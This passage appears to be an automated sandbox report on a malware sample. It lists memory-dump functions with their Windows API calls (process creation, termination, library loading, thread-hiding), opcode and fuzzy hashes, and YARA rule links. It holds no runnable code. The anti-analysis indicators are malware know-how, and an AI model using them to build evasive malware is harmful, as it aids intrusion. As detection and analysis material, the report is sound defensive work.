                                  • Opcode ID: 1a625ab6298a93c5c0cb192118f88a12e1e60756d9e8998f152faba5b604b762
                                  • Instruction ID: 535ebf62cef7c82c872b42b12b5b78f3d75211b90b8b9554e2d581badc3b33cf
                                  • Opcode Fuzzy Hash: 1a625ab6298a93c5c0cb192118f88a12e1e60756d9e8998f152faba5b604b762
                                  • Instruction Fuzzy Hash: E021F120536207CEDF24BED084843F423609F463B8F999751CC5617AECE3A9C4DBCA82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022898A3, Relevance: 1.6, APIs: 1, Instructions: 84processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: b27b86b9ee88631965357e7fed3ba4e3598bb36f8e99d3ad8dafda05b56e4906
                                  • Instruction ID: 8e54215481e86dd67e8073610cb2a1bac58c9d8c2a9a5b91727b01acdbcdb098
                                  • Opcode Fuzzy Hash: b27b86b9ee88631965357e7fed3ba4e3598bb36f8e99d3ad8dafda05b56e4906
                                  • Instruction Fuzzy Hash: E421F320636207CEDF24BED084843F423609F563ACF599661CC4A57AECE3B9C4DBC692
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022898D4, Relevance: 1.6, APIs: 1, Instructions: 82processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 4bf9935012d2571c7d409891de28251b07b0b3699567ede03e4234ca914c6ef9
                                  • Instruction ID: 888bc5b4b6f882348ec2d5ae8df2d2a04688e73dba83d5e816ee9f7c535a6a0c
                                  • Opcode Fuzzy Hash: 4bf9935012d2571c7d409891de28251b07b0b3699567ede03e4234ca914c6ef9
                                  • Instruction Fuzzy Hash: 9821C320536247CEDF14EED084853F423609F563A8F599661CC4617AEDE3B9C4DBC6D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022812E5, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 1e9efb8bacbb544751399bd41e9829d1a9350a65f5449cb5bacfe035b772c5bf
                                  • Instruction ID: 3eed940ed45defeb0e08af829e89da6a5a831dcb9ff14fa2a04f399f2f09804c
                                  • Opcode Fuzzy Hash: 1e9efb8bacbb544751399bd41e9829d1a9350a65f5449cb5bacfe035b772c5bf
                                  • Instruction Fuzzy Hash: 6F11AB2041A38797EF2271D044013E92B059B03320FA483A6D84E0A9CDD38BC9AB96D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02284D21, Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrInitializeThunk.NTDLL(00000000,?,00000041,00000252,?,02285BA4,?,?,?,00000852,?,?,000009D9,00000000,?,00400000), ref: 0228588D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cc836ed8dcf6bab84f36604793d90562d8b2173ecceca13cdbac7f254ad6bf0f
                                  • Instruction ID: c7b6d9d25e17df093229dd14a3deadf77e1d38b6e30d30fedcf98041978585d8
                                  • Opcode Fuzzy Hash: cc836ed8dcf6bab84f36604793d90562d8b2173ecceca13cdbac7f254ad6bf0f
                                  • Instruction Fuzzy Hash: 7901C0D1945A8783ED04944160425D63B1092573A1BB6DBB2CC0E16E9DB54D893FAAE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289A22, Relevance: 1.6, APIs: 1, Instructions: 80processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 9cd9ee6cf289c0a5ab9fd666d7f248a844509c1953a02b68474a9904aa362c54
                                  • Instruction ID: 507799fcd0a80eee2dce6575d9a89ff93093db1acf29c68bb456ecfad6dbfc18
                                  • Opcode Fuzzy Hash: 9cd9ee6cf289c0a5ab9fd666d7f248a844509c1953a02b68474a9904aa362c54
                                  • Instruction Fuzzy Hash: CB11E580A516878AEE04E99090811F4371068573A47A99BB2CC4E17E9CF25A49BFD6E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02286FDA, Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: fdc0e94e8e8de249c5a425eed9dbf451dc12612f235e3a24f67bec44b6ddd087
                                  • Instruction ID: 5bb82ac2a30982825debb878bf680f78e0a2c5c4cd595f52e367637bc14728e0
                                  • Opcode Fuzzy Hash: fdc0e94e8e8de249c5a425eed9dbf451dc12612f235e3a24f67bec44b6ddd087
                                  • Instruction Fuzzy Hash: 5911045CA3B347D2DE2036E095807FDD3114A112A5F70866BEC17459DDE6E8C08BD9E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022816ED, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 3540dd14fd11b2304a2d636d63d1c0f01d6f6ad228f88add88d1c11499841609
                                  • Instruction ID: 68985c28665abe89cdf28ab425f3897f35e26487eba278ddf6e05e7f7a16b135
                                  • Opcode Fuzzy Hash: 3540dd14fd11b2304a2d636d63d1c0f01d6f6ad228f88add88d1c11499841609
                                  • Instruction Fuzzy Hash: EC218E5251B383AAF70276684C65BFA2A232F937C8F5D424CDCCA572CDC3AAD416C265
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228175C, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: d0a4ffc97f36a40dd92a6b5bd1185e819801af150698600f79838f23b28db42f
                                  • Instruction ID: 7741bf6b05f8f40d2da0b52ff40f45c66ee814df4c7c16106237933e492f419c
                                  • Opcode Fuzzy Hash: d0a4ffc97f36a40dd92a6b5bd1185e819801af150698600f79838f23b28db42f
                                  • Instruction Fuzzy Hash: 55119E4150978397FB0165585C25BE62B221F937D4F6A83589C8E13ACDD35A943B82F3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289932, Relevance: 1.6, APIs: 1, Instructions: 75processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: aabfd72ee0484144eeef47c22ec8580d38f270f9126c10212e47f5bd5df93678
                                  • Instruction ID: b58a707da113f340513a9ff5f3d6b79608ab306e159442eb34dc7e0447c607ba
                                  • Opcode Fuzzy Hash: aabfd72ee0484144eeef47c22ec8580d38f270f9126c10212e47f5bd5df93678
                                  • Instruction Fuzzy Hash: 4511B120936247CEDF14EE9080853F423509F563ACF5996A1CC4617AEDE3B9C4DBC6D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228990A, Relevance: 1.6, APIs: 1, Instructions: 75processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 16b142ea75ec1d69d7ae003298bb18dbf999531fd22baba3797efb9fb332c55b
                                  • Instruction ID: a36dd994d6db87c43bd58927ebb3c8c66b7068f8dd5f577c27086165fd1e0aeb
                                  • Opcode Fuzzy Hash: 16b142ea75ec1d69d7ae003298bb18dbf999531fd22baba3797efb9fb332c55b
                                  • Instruction Fuzzy Hash: DD11BE20936207CEDA24BE9081853F423609F563FCF5A9691CC4617AEDE3B9C4DBC692
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289972, Relevance: 1.6, APIs: 1, Instructions: 67processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: cbe3735a52a8886767192ae4a8d4582abac6ac750673d5451a15db7c07e09426
                                  • Instruction ID: bd9eb428e73736e8c1b07a5543b8248ba00c2905cb714c20338bc4a22d95e95f
                                  • Opcode Fuzzy Hash: cbe3735a52a8886767192ae4a8d4582abac6ac750673d5451a15db7c07e09426
                                  • Instruction Fuzzy Hash: 0011E010A32243CDDA18BE9080853F423609F562ACF998691CC4617AECE3B9C0DBC6D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022899A6, Relevance: 1.6, APIs: 1, Instructions: 66processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 479f87002e3eb1dc2b8bf40e5fa65ca8d01d9d95bc2a2e8503d2db5c9e20d4bf
                                  • Instruction ID: 2923aa18d87efa7596956c099e40d2fd066757f1455c438d6a8a28cae1f8009d
                                  • Opcode Fuzzy Hash: 479f87002e3eb1dc2b8bf40e5fa65ca8d01d9d95bc2a2e8503d2db5c9e20d4bf
                                  • Instruction Fuzzy Hash: 0801C410A26243CEDA18FE9080853F423115F573A8F9996A1CC4617EACE37AC4DFC6D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022817A7, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: be0bc8b578fad7c66270a90c560c60368befecf00ef5c833fbb79177c806858d
                                  • Instruction ID: 212ab94ab9c8cd68e5d5e329bc0aaa735a01e7e8f869755ea3688b7688198086
                                  • Opcode Fuzzy Hash: be0bc8b578fad7c66270a90c560c60368befecf00ef5c833fbb79177c806858d
                                  • Instruction Fuzzy Hash: 73118C1140D7C397FB0165545842BEA3B226F43394F6A4359DC4D17DC9D39B943B86E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228713A, Relevance: 1.6, APIs: 1, Instructions: 61libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 7d5ab6729ed1d2b9ebbf37b8f5813fb0b5776742bcfb0d5674afb7c8d2d88f60
                                  • Instruction ID: 1c97208b40f7f9ae5d14d5c28dac1abcb2186e75fa34e355a2a89470badd5545
                                  • Opcode Fuzzy Hash: 7d5ab6729ed1d2b9ebbf37b8f5813fb0b5776742bcfb0d5674afb7c8d2d88f60
                                  • Instruction Fuzzy Hash: 9501FD4863A34AC3DE0075E050807FDA3004A123A1B308B76AC0B15EDCF6E8C42BE9E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02281346, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: fc3cff4791fad27f8b81be970a16343b65ddc193ebe89efb6e52f5bd524c7c39
                                  • Instruction ID: 52027ec5a51bfcedec5fb0f5c7c08ae3fe53f37835cba790924a23095486f8eb
                                  • Opcode Fuzzy Hash: fc3cff4791fad27f8b81be970a16343b65ddc193ebe89efb6e52f5bd524c7c39
                                  • Instruction Fuzzy Hash: 5C016D1091A78397FF1160E054013F92B155B53320FA58366DC0E06DCCE38EC46BA6D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022899F0, Relevance: 1.6, APIs: 1, Instructions: 60processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: f5eed26749ea5a09780008cdc30d7f129f476383e62b93d51a08b2ff9727caba
                                  • Instruction ID: 19a835095663b06c377abadd57af58bf81d89ded0d16eeff59b92131d437bc09
                                  • Opcode Fuzzy Hash: f5eed26749ea5a09780008cdc30d7f129f476383e62b93d51a08b2ff9727caba
                                  • Instruction Fuzzy Hash: D3014E00B26643CADA08F99090822F427115C572E87EDC7918C4B17F9CF26E84EFC6D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228076B, Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • EnumWindows.USER32(02280811,?,00000000,000000D3,?,000021D9,000021D9,00000000,00000004,00000000,00000000,000025D9,000029D9), ref: 022807AB
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,00000040,02280914,00000000,00000000,00000000,00000000,?), ref: 022809B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: EnumInformationThreadWindows
                                  • String ID:
                                  • API String ID: 1954852945-0
                                  • Opcode ID: c3008fa53d801907b086e3d481011feb6407ac612742c2a0439417e8216919d8
                                  • Instruction ID: dcab2b43611a2fe679ec423e5b01b5e9b849cfcb32f8c62b1f4d4b4e8b733e38
                                  • Opcode Fuzzy Hash: c3008fa53d801907b086e3d481011feb6407ac612742c2a0439417e8216919d8
                                  • Instruction Fuzzy Hash: 74F0DD32521601ABEA0091E05450BFA3301C783770F70CB26D80F87D94F04589EF8AD3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022817F3, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: a55374c604c7eea74c84fbdafc89e3c028cc3b7af899c7f749ead8540460ef47
                                  • Instruction ID: 4a67933a158f322aad8f7d7a0a9823f294ce817ff920f350c1c25a0a39cdee56
                                  • Opcode Fuzzy Hash: a55374c604c7eea74c84fbdafc89e3c028cc3b7af899c7f749ead8540460ef47
                                  • Instruction Fuzzy Hash: FE012B415197C3D3FB00655464427EA2B225B537D0F6683958C4E07DCDD35B883B96E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0228717A, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: e348ca9fbf6215d4e262d8d7c36c28025139a67e292ff363d45452496405bc01
                                  • Instruction ID: 9e2f290b79ad12b49e06bbdf9cddb8c6da2e1db0475e20e4af4c540f9efe79fc
                                  • Opcode Fuzzy Hash: e348ca9fbf6215d4e262d8d7c36c28025139a67e292ff363d45452496405bc01
                                  • Instruction Fuzzy Hash: 15F0F65863A347C39E0475E064906FDA3005D123A1B30C776AC0B19D9CF6D8C42BEAE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022871AB, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: c3b5a3735a799b5d28291e7862685c32e4bbc04c0ebab52bbe63af4aab5e70e9
                                  • Instruction ID: f66519f45739e3648de1ebffed22f478993f04ccb5caf3b4e6ef4e5875242892
                                  • Opcode Fuzzy Hash: c3b5a3735a799b5d28291e7862685c32e4bbc04c0ebab52bbe63af4aab5e70e9
                                  • Instruction Fuzzy Hash: B0F0F65967A747C3990475E060816EEA30058132B2B30C776AC0B06D9CF6D8C42BDDE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289AB9, Relevance: 1.6, APIs: 1, Instructions: 51processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 00a32614f54cfb79322aa7c41b24f331657e9a6b9996675115ccfd9b85570ccf
                                  • Instruction ID: 87f8274d35ae6b4762cd1f0c3380f75d82e1a45e35380bd9636e69d19a4ad9be
                                  • Opcode Fuzzy Hash: 00a32614f54cfb79322aa7c41b24f331657e9a6b9996675115ccfd9b85570ccf
                                  • Instruction Fuzzy Hash: 05F04C615446838AEF0ADEA0C4451E43F209C533947698BFDCC8E07E99F219896FE7E2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02289A82, Relevance: 1.6, APIs: 1, Instructions: 51processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(00000000,?,00003000,00000004), ref: 02289B0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 3b1ea940387608f0e88e9d766a7f9c1181cc7c719e07e590353b1e1e25a24090
                                  • Instruction ID: 370870dea4c072541b7820dfd9452158019501e76297f0b84d73743f49a38051
                                  • Opcode Fuzzy Hash: 3b1ea940387608f0e88e9d766a7f9c1181cc7c719e07e590353b1e1e25a24090
                                  • Instruction Fuzzy Hash: 7BF0F650B5168789EE08EDA080811F437215C673A87ED97A1CC4A17E9CF21984EFD6D3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02287085, Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: d1001d96583093f647ca1ac36f3660a3d1d0e2fe0057679143e81208289adfd8
                                  • Instruction ID: 8aec9d550b97812eb51b3d5f69c453b9a5d29e741078836ec6535367dc3b33a4
                                  • Opcode Fuzzy Hash: d1001d96583093f647ca1ac36f3660a3d1d0e2fe0057679143e81208289adfd8
                                  • Instruction Fuzzy Hash: E0F0AF5C63B306E5DE2036E049907BDC2424F213A1F70462BBC53944DDEAE0C088D963
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02287211, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: f244ed7c0e16fc7127d01af283813be9761675e77b01ce0ddc20adbea9f005a1
                                  • Instruction ID: 5cebe35855514e2b9cf4288c9f379be23f835c9d855d50b843ce10fc62d2b12e
                                  • Opcode Fuzzy Hash: f244ed7c0e16fc7127d01af283813be9761675e77b01ce0ddc20adbea9f005a1
                                  • Instruction Fuzzy Hash: 8BF0E949565747C7DE00699010401D8671059433A1B31CB72EC0E16EDDF698892BDAE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022870B9, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: cf232daff773923d4934661cbc1bbfee623e66589d4e922988d3c0ab028b3c7d
                                  • Instruction ID: 03fa71d5189426b589e77f2789d9a9ad114c743c996edd9c80930554ce88528c
                                  • Opcode Fuzzy Hash: cf232daff773923d4934661cbc1bbfee623e66589d4e922988d3c0ab028b3c7d
                                  • Instruction Fuzzy Hash: C5F0905C63B34AE5DE2136F04990BBDC2924F213A1F70462BBC53945EDEBE4C089D967
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022872CC, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 4c9cf7ab7f12431c7b10da289eb3626594e3223d72137108bb2cf5c30e3d5047
                                  • Instruction ID: b99c3cdd9ecc8e8356fcd2330f201f2dcac3b1a711fbc626e8a64c2c33108e45
                                  • Opcode Fuzzy Hash: 4c9cf7ab7f12431c7b10da289eb3626594e3223d72137108bb2cf5c30e3d5047
                                  • Instruction Fuzzy Hash: B3F0EC87EA174783DD04599064811C8631194672B2BB1CBB2DC0E0AE4DF64D896F59E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022813AA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: ad86033d091b502d280826ea1ff131a80fcab96da4ec3173f40c649fa7737cfe
                                  • Instruction ID: e3ca5b28826a2741b9499481f902810e2fe9bd78da079d7df8f578a78e03eb4f
                                  • Opcode Fuzzy Hash: ad86033d091b502d280826ea1ff131a80fcab96da4ec3173f40c649fa7737cfe
                                  • Instruction Fuzzy Hash: 76F0278050968783FF00509064027F927001743320F75C7769C0E06EC9B28D897F65E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 022871E2, Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNELBASE(?,000000D3,?,022804F0,00000000), ref: 022872E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 6e39775fa2db7d1aa1b82b1bb7404f2c90b560f0722f6cb48758c5f216ba7989
                                  • Instruction ID: 12cd8a4234d152a8cfaca99f943b36d1643298238b8b7992e9be96771cdf0dea
                                  • Opcode Fuzzy Hash: 6e39775fa2db7d1aa1b82b1bb7404f2c90b560f0722f6cb48758c5f216ba7989
                                  • Instruction Fuzzy Hash: 1AF0A75967A347D39D0479E120916DAA3005D532A2B318736BC0B19E9CB6D8C41FDAE3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02281857, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 0228439F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.348192824.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 21b4ab15b5313f3a038c475ec5647eecd8f4d317a6c3250b35307c00b0c098f6
                                  • Instruction ID: 9954d67f3e653a3c76211af15c9c960b6503ccafa9ed7f4f3a952858dd87fa4c
                                  • Opcode Fuzzy Hash: 21b4ab15b5313f3a038c475ec5647eecd8f4d317a6c3250b35307c00b0c098f6
                                  • Instruction Fuzzy Hash: F8E09280905687C3FE04A44134527E5271056933E1F7AC7B28C0F06EDDB2498D3FA9E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02284366, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                  Download Yara Rule
                                  APIs
